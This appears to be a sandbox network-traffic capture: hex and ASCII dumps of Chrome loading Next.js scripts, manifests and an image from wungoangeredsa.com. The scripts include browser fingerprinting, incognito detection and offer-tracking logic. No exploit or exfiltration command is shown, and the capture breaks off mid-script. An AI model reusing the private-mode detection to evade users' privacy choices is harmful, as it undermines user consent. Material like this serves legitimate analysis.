                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 28 6f 3d 32 26 75 5b 30 5d 3f 72 2e 72 65 74 75 72 6e 3a 75 5b 30 5d 3f 72 2e 74 68 72 6f 77 7c 7c 28 28 6f 3d 72 2e 72 65 74 75 72 6e 29 26 26 6f 2e 63 61 6c 6c 28 72 29 2c 30 29 3a 72 2e 6e 65 78 74 29 26 26 21 28 6f 3d 6f 2e 63 61 6c 6c 28 72 2c 75 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 6f 3b 73 77 69 74 63 68 28 72 3d 30 2c 6f 26 26 28 75 3d 5b 32 26 75 5b 30 5d 2c 6f 2e 76 61 6c 75 65 5d 29 2c 75 5b 30 5d 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 6f 3d 75 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 69 2e 6c 61 62 65 6c 2b 2b 2c 7b 76 61 6c 75 65 3a 75 5b 31 5d 2c 64 6f 6e 65 3a 21 31 7d 3b 63 61 73 65 20 35 3a 69 2e 6c 61 62 65 6c 2b 2b 2c 72 3d 75 5b 31 5d 2c 75 3d 5b 30 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61
                                                                                                          Data Ascii: (o=2&u[0]?r.return:u[0]?r.throw||((o=r.return)&&o.call(r),0):r.next)&&!(o=o.call(r,u[1])).done)return o;switch(r=0,o&&(u=[2&u[0],o.value]),u[0]){case 0:case 1:o=u;break;case 4:return i.label++,{value:u[1],done:!1};case 5:i.label++,r=u[1],u=[0];continue;ca
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 20 69 73 53 61 66 61 72 69 28 29 7b 72 65 74 75 72 6e 20 34 34 3d 3d 3d 66 65 69 64 28 29 7d 66 75 6e 63 74 69 6f 6e 20 69 73 43 68 72 6f 6d 65 28 29 7b 72 65 74 75 72 6e 20 35 31 3d 3d 3d 66 65 69 64 28 29 7d 66 75 6e 63 74 69 6f 6e 20 69 73 46 69 72 65 66 6f 78 28 29 7b 72 65 74 75 72 6e 20 32 35 3d 3d 3d 66 65 69 64 28 29 7d 66 75 6e 63 74 69 6f 6e 20 69 73 4d 53 49 45 28 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 6e 61 76 69 67 61 74 6f 72 2e 6d 73 53 61 76 65 42 6c 6f 62 26 26 61 73 73 65 72 74 45 76 61 6c 54 6f 53 74 72 69 6e 67 28 33 39 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 65 77 53 61 66 61 72 69 54 65 73 74 28 29 7b 76 61 72 20 65 3d 53 74 72 69 6e 67 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 3b 74 72 79 7b 77 69 6e 64 6f 77 2e 69 6e
                                                                                                          Data Ascii: isSafari(){return 44===feid()}function isChrome(){return 51===feid()}function isFirefox(){return 25===feid()}function isMSIE(){return void 0!==navigator.msSaveBlob&&assertEvalToString(39)}function newSafariTest(){var e=String(Math.random());try{window.in
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 2a 4d 61 74 68 2e 72 6f 75 6e 64 28 67 65 74 51 75 6f 74 61 4c 69 6d 69 74 28 29 2f 31 30 34 38 35 37 36 29 29 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 6a 65 63 74 28 6e 65 77 20 45 72 72 6f 72 28 22 64 65 74 65 63 74 49 6e 63 6f 67 6e 69 74 6f 20 73 6f 6d 65 68 6f 77 20 66 61 69 6c 65 64 20 74 6f 20 71 75 65 72 79 20 73 74 6f 72 61 67 65 20 71 75 6f 74 61 3a 20 22 2b 65 2e 6d 65 73 73 61 67 65 29 29 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 6c 64 43 68 72 6f 6d 65 50 72 69 76 61 74 65 54 65 73 74 28 29 7b 28 30 2c 77 69 6e 64 6f 77 2e 77 65 62 6b 69 74 52 65 71 75 65 73 74 46 69 6c 65 53 79 73 74 65 6d 29 28 30 2c 31 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 5f 5f 63 61 6c 6c 62 61 63 6b 28 21 31 29 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                          Data Ascii: *Math.round(getQuotaLimit()/1048576))}),(function(e){reject(new Error("detectIncognito somehow failed to query storage quota: "+e.message))}))}function oldChromePrivateTest(){(0,window.webkitRequestFileSystem)(0,1,(function(){__callback(!1)}),(function(){
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 6f 61 64 69 6e 67 3b 72 65 74 75 72 6e 20 65 2e 70 61 73 74 44 65 6c 61 79 2c 6e 75 6c 6c 7d 7d 3b 72 28 65 2c 50 72 6f 6d 69 73 65 29 3f 61 2e 6c 6f 61 64 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 65 3f 61 2e 6c 6f 61 64 65 72 3d 65 3a 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 61 3d 6f 28 7b 7d 2c 61 2c 65 29 29 3b 69 66 28 28 61 3d 6f 28 7b 7d 2c 61 2c 74 29 29 2e 73 75 73 70 65 6e 73 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 73 75 73 70 65 6e 73 65 20 6f 70 74 69 6f 6e 20 75 73 61 67 65 20 69 6e 20 6e 65 78 74 2f 64 79 6e 61 6d 69 63 2e 20 52 65 61 64 20 6d 6f 72 65 3a 20 68 74 74 70 73 3a 2f 2f 6e 65
                                                                                                          Data Ascii: oading;return e.pastDelay,null}};r(e,Promise)?a.loader=function(){return e}:"function"===typeof e?a.loader=e:"object"===typeof e&&(a=o({},a,e));if((a=o({},a,t)).suspense)throw new Error("Invalid suspense option usage in next/dynamic. Read more: https://ne
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 6e 20 66 28 65 29 7b 76 61 72 20 74 3d 65 28 29 2c 6e 3d 7b 6c 6f 61 64 69 6e 67 3a 21 30 2c 6c 6f 61 64 65 64 3a 6e 75 6c 6c 2c 65 72 72 6f 72 3a 6e 75 6c 6c 7d 3b 72 65 74 75 72 6e 20 6e 2e 70 72 6f 6d 69 73 65 3d 74 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 2e 6c 6f 61 64 69 6e 67 3d 21 31 2c 6e 2e 6c 6f 61 64 65 64 3d 65 2c 65 7d 29 29 2e 63 61 74 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 6e 2e 6c 6f 61 64 69 6e 67 3d 21 31 2c 6e 2e 65 72 72 6f 72 3d 65 2c 65 7d 29 29 2c 6e 7d 76 61 72 20 76 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 29 7b 72 28 74 68 69 73 2c 65 29 2c 74 68 69 73 2e 5f 6c 6f 61 64 46 6e 3d 74 2c 74 68 69 73 2e 5f 6f 70 74 73 3d 6e 2c 74
                                                                                                          Data Ascii: n f(e){var t=e(),n={loading:!0,loaded:null,error:null};return n.promise=t.then((function(e){return n.loading=!1,n.loaded=e,e})).catch((function(e){throw n.loading=!1,n.error=e,e})),n}var v=function(){function e(t,n){r(this,e),this._loadFn=t,this._opts=n,t
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 74 75 72 6e 20 74 68 69 73 2e 5f 63 61 6c 6c 62 61 63 6b 73 2e 61 64 64 28 65 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 5f 63 61 6c 6c 62 61 63 6b 73 2e 64 65 6c 65 74 65 28 65 29 7d 7d 7d 5d 29 2c 65 7d 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 6c 29 7b 76 61 72 20 74 3d 6e 65 77 20 76 28 65 2c 6f 29 3b 6c 3d 7b 67 65 74 43 75 72 72 65 6e 74 56 61 6c 75 65 3a 74 2e 67 65 74 43 75 72 72 65 6e 74 56 61 6c 75 65 2e 62 69 6e 64 28 74 29 2c 73 75 62 73 63 72 69 62 65 3a 74 2e 73 75 62 73 63 72 69 62 65 2e 62 69 6e 64 28 74 29 2c 72 65 74 72 79 3a 74 2e 72 65 74 72 79 2e 62 69 6e 64 28 74 29 2c 70 72 6f 6d 69 73 65 3a 74 2e
                                                                                                          Data Ascii: turn this._callbacks.add(e),function(){t._callbacks.delete(e)}}}]),e}();function m(e){return function(e,t){var n=function(){if(!l){var t=new v(e,o);l={getCurrentValue:t.getCurrentValue.bind(t),subscribe:t.subscribe.bind(t),retry:t.retry.bind(t),promise:t.
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 65 66 61 75 6c 74 3a 74 2c 65 29 3a 6e 75 6c 6c 3b 76 61 72 20 74 7d 29 2c 5b 65 2c 6e 5d 29 7d 3b 72 65 74 75 72 6e 20 6d 2e 70 72 65 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 28 29 7d 2c 6d 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 4c 6f 61 64 61 62 6c 65 43 6f 6d 70 6f 6e 65 6e 74 22 2c 69 2e 64 65 66 61 75 6c 74 2e 66 6f 72 77 61 72 64 52 65 66 28 6d 29 7d 28 66 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 5b 5d 3b 65 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 72 3d 65 2e 70 6f 70 28 29 3b 6e 2e 70 75 73 68 28 72 28 74 29 29 7d 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 6e 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 65 2e 6c 65 6e 67 74 68 29
                                                                                                          Data Ascii: efault:t,e):null;var t}),[e,n])};return m.preload=function(){return n()},m.displayName="LoadableComponent",i.default.forwardRef(m)}(f,e)}function p(e,t){for(var n=[];e.length;){var r=e.pop();n.push(r(t))}return Promise.all(n).then((function(){if(e.length)
                                                                                                          2025-01-06 11:09:22 UTC304INData Raw: 3d 3d 72 2e 75 73 65 53 79 6e 63 45 78 74 65 72 6e 61 6c 53 74 6f 72 65 3f 72 2e 75 73 65 53 79 6e 63 45 78 74 65 72 6e 61 6c 53 74 6f 72 65 3a 63 7d 2c 34 33 31 30 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 28 32 30 34 35 32 29 7d 2c 34 32 38 33 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 74 5b 53 79 6d 62 6f 6c 2e 68 61 73 49 6e 73 74 61 6e 63 65 5d 3f 21 21 74 5b 53 79 6d 62 6f 6c 2e 68 61 73 49 6e 73 74 61 6e 63 65 5d 28 65 29 3a 65 20 69 6e
                                                                                                          Data Ascii: ==r.useSyncExternalStore?r.useSyncExternalStore:c},43100:function(e,t,n){"use strict";e.exports=n(20452)},42838:function(e,t,n){"use strict";function r(e,t){return null!=t&&"undefined"!==typeof Symbol&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):e in
                                                                                                          2025-01-06 11:09:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          50192.168.2.450093104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:22 UTC394OUTGET /_next/static/3ufPxZgwc9gMArDis_san/_buildManifest.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:22 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:22 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-4e5"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1055
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:22 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41674f424332-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:22 UTC874INData Raw: 34 65 35 0d 0a 73 65 6c 66 2e 5f 5f 42 55 49 4c 44 5f 4d 41 4e 49 46 45 53 54 3d 7b 5f 5f 72 65 77 72 69 74 65 73 3a 7b 62 65 66 6f 72 65 46 69 6c 65 73 3a 5b 5d 2c 61 66 74 65 72 46 69 6c 65 73 3a 5b 5d 2c 66 61 6c 6c 62 61 63 6b 3a 5b 5d 7d 2c 22 2f 22 3a 5b 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 34 30 37 64 61 38 33 35 39 38 65 61 32 32 33 35 2d 31 37 33 36 30 37 32 36 38 36 35 33 39 2d 31 33 32 38 38 65 61 30 39 34 33 32 32 30 38 38 2e 6a 73 22 5d 2c 22 2f 34 30 34 22 3a 5b 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 32 33 30 37 39 32 32 36 37 38 31 34 65 33 39 64 2d 31 37 33 36 30 37 32 36 38 36 35 33 39 2d 64 62 33 36 64 39 35 61 65 36 38 66 62 37 61 31 2e 6a 73 22 5d 2c 22 2f 5f 65 72 72 6f 72 22 3a 5b 22 73 74 61 74 69 63 2f 63 68 75 6e 6b
                                                                                                          Data Ascii: 4e5self.__BUILD_MANIFEST={__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":["static/chunks/407da83598ea2235-1736072686539-13288ea094322088.js"],"/404":["static/chunks/230792267814e39d-1736072686539-db36d95ae68fb7a1.js"],"/_error":["static/chunk
                                                                                                          2025-01-06 11:09:22 UTC386INData Raw: 64 69 6e 67 4e 61 6d 65 5d 2f 5b 63 6f 6e 66 69 67 49 64 5d 2f 5b 5b 2e 2e 2e 73 6c 75 67 5d 5d 22 3a 5b 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 65 33 34 39 66 66 64 62 62 36 35 64 36 63 39 33 2d 31 37 33 36 30 37 32 36 38 36 35 33 39 2d 36 36 30 65 35 62 37 65 32 65 33 62 37 39 39 36 2e 6a 73 22 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 66 31 31 61 34 63 30 33 32 34 37 31 38 33 31 66 2d 31 37 33 36 30 37 32 36 38 36 35 33 39 2d 64 66 36 62 38 34 32 66 32 31 38 33 38 36 33 62 2e 6a 73 22 5d 2c 73 6f 72 74 65 64 50 61 67 65 73 3a 5b 22 2f 22 2c 22 2f 34 30 34 22 2c 22 2f 5f 61 70 70 22 2c 22 2f 5f 65 72 72 6f 72 22 2c 22 2f 61 72 74 69 63 6c 65 2f 5b 69 64 5d 22 2c 22 2f 62 61 63 6b 22 2c 22 2f 63 6f 6f 6b 69 65 22 2c 22 2f 70 72 69 76 61 63 79
                                                                                                          Data Ascii: dingName]/[configId]/[[...slug]]":["static/chunks/e349ffdbb65d6c93-1736072686539-660e5b7e2e3b7996.js","static/chunks/f11a4c032471831f-1736072686539-df6b842f2183863b.js"],sortedPages:["/","/404","/_app","/_error","/article/[id]","/back","/cookie","/privacy
                                                                                                          2025-01-06 11:09:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          51192.168.2.450095104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:22 UTC392OUTGET /_next/static/3ufPxZgwc9gMArDis_san/_ssgManifest.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:22 UTC494INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:22 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-a0"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1627
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:22 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4167cb974273-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:22 UTC166INData Raw: 61 30 0d 0a 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 3d 6e 65 77 20 53 65 74 28 5b 22 5c 75 30 30 32 46 5b 6c 61 6e 64 69 6e 67 4e 61 6d 65 5d 5c 75 30 30 32 46 5b 63 6f 6e 66 69 67 49 64 5d 5c 75 30 30 32 46 5b 5b 2e 2e 2e 73 6c 75 67 5d 5d 22 2c 22 5c 75 30 30 32 46 61 72 74 69 63 6c 65 5c 75 30 30 32 46 5b 69 64 5d 22 5d 29 3b 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 5f 43 42 26 26 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 5f 43 42 28 29 0d 0a
                                                                                                          Data Ascii: a0self.__SSG_MANIFEST=new Set(["\u002F[landingName]\u002F[configId]\u002F[[...slug]]","\u002Farticle\u002F[id]"]);self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB()
                                                                                                          2025-01-06 11:09:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          52192.168.2.450097104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:22 UTC595OUTGET /_next/static/media/comments-empty-user.c37f32b6.webp HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: image
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:22 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:22 GMT
                                                                                                          Content-Type: image/webp
                                                                                                          Content-Length: 264
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: "677a5f14-108"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1627
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:22 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Accept-Ranges: bytes
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4167bc677c78-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:22 UTC264INData Raw: 52 49 46 46 00 01 00 00 57 45 42 50 56 50 38 20 f4 00 00 00 b0 0c 00 9d 01 2a 64 00 64 00 3e d1 60 a6 4d 28 26 23 a2 2d be 78 01 00 1a 09 67 00 d1 88 a8 d1 6d a4 04 c2 b9 41 25 5d ee a0 7b 6e 9e 0a 58 b6 6a a1 f3 42 89 09 ab c6 b7 81 db 25 4e 94 a1 86 c8 02 e9 55 80 fc f3 8a 07 39 97 94 0c 5e bc f4 94 48 be a6 90 91 f7 39 74 97 83 bd f6 e5 64 6c 4a be 4c e6 40 9d 45 93 ab eb 84 80 38 00 00 fe ee e9 80 fe d3 4c 59 44 bf 9c b7 d0 47 38 73 3f 1f 83 47 08 18 46 06 f4 bd b6 53 d0 d0 7c 35 b8 2f ec 99 27 cb 0e fa 58 a3 38 67 c6 c1 d6 bf 84 54 7d 46 4a 50 cb 35 a6 ca df 1b 6a 46 e4 dc 1b 5d 5e ce 85 01 e0 b1 e6 dd 67 99 31 2b 7e 08 d9 de b5 bf fd a9 68 6b dc 08 e5 d2 ed 39 40 e6 5a 64 58 c7 48 b9 81 8d 48 79 d4 9a 09 a7 d9 8a b6 e3 f3 e4 b7 ba f0 9a 5f 84 36 61
                                                                                                          Data Ascii: RIFFWEBPVP8 *dd>`M(&#-xgmA%]{nXjB%NU9^H9tdlJL@E8LYDG8s?GFS|5/'X8gT}FJP5jF]^g1+~hk9@ZdXHHy_6a


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          53192.168.2.450101104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:22 UTC553OUTGET /_next/static/chunks/ac5595402e335eea-1736072686539.3cfdc57f0372e5e9.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:22 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:22 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-1b79"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1055
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:22 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4167fe498c84-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:22 UTC873INData Raw: 31 62 37 39 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 37 30 38 31 5d 2c 7b 34 37 30 38 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 61 29 7b 61 2e 72 28 72 29 2c 61 2e 64 28 72 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 7d 7d 29 3b 76 61 72 20 73 2c 74 3d 61 28 37 30 38 36 35 29 2c 6e 3d 61 28 39 36 36 37 30 29 2c 63 3d 61 28 31 32 31 33 39 29 2c 69 3d 61 28 35 34 39 38 33 29 2c 6f 3d 61 28 36 30 38 33 38 29 2c 75 3d 61 28 34 37 37 34 37 29 2c 6c 3d 61 28 37 31 39 36 31 29 2c 64 3d 61 28 32 35 38 36 39 29 2c 66 3d 61 28 35 33 34 34 34 29
                                                                                                          Data Ascii: 1b79"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[47081],{47081:function(e,r,a){a.r(r),a.d(r,{default:function(){return A}});var s,t=a(70865),n=a(96670),c=a(12139),i=a(54983),o=a(60838),u=a(47747),l=a(71961),d=a(25869),f=a(53444)
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 65 64 69 72 65 63 74 6c 65 73 73 2c 75 3d 65 2e 69 73 52 65 64 69 72 65 63 74 6c 65 73 73 2c 64 3d 65 2e 69 73 4f 66 66 65 72 50 61 6e 65 6c 2c 70 3d 28 30 2c 63 2e 75 73 65 53 74 61 74 65 29 28 6e 75 6c 6c 29 2c 6b 3d 70 5b 30 5d 2c 52 3d 70 5b 31 5d 2c 4f 3d 28 30 2c 63 2e 75 73 65 53 74 61 74 65 29 28 6e 75 6c 6c 29 2c 41 3d 4f 5b 30 5d 2c 49 3d 4f 5b 31 5d 2c 45 3d 28 30 2c 63 2e 75 73 65 53 74 61 74 65 29 28 6e 75 6c 6c 29 2c 46 3d 45 5b 30 5d 2c 4d 3d 45 5b 31 5d 2c 77 3d 28 30 2c 6d 2e 4d 29 28 29 2e 73 79 6e 63 4d 65 74 72 69 63 2c 54 3d 28 30 2c 63 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 28 30 2c 6c 2e 63 4d 29 28 22 2f 74 72 61 63 6b 3a 20 75 73 65 46 65 74 63 68 54 72 61 63 6b 3a 20 69 73 4f 66 66 65 72 50
                                                                                                          Data Ascii: edirectless,u=e.isRedirectless,d=e.isOfferPanel,p=(0,c.useState)(null),k=p[0],R=p[1],O=(0,c.useState)(null),A=O[0],I=O[1],E=(0,c.useState)(null),F=E[0],M=E[1],w=(0,m.M)().syncMetric,T=(0,c.useCallback)((function(){(0,l.cM)("/track: useFetchTrack: isOfferP
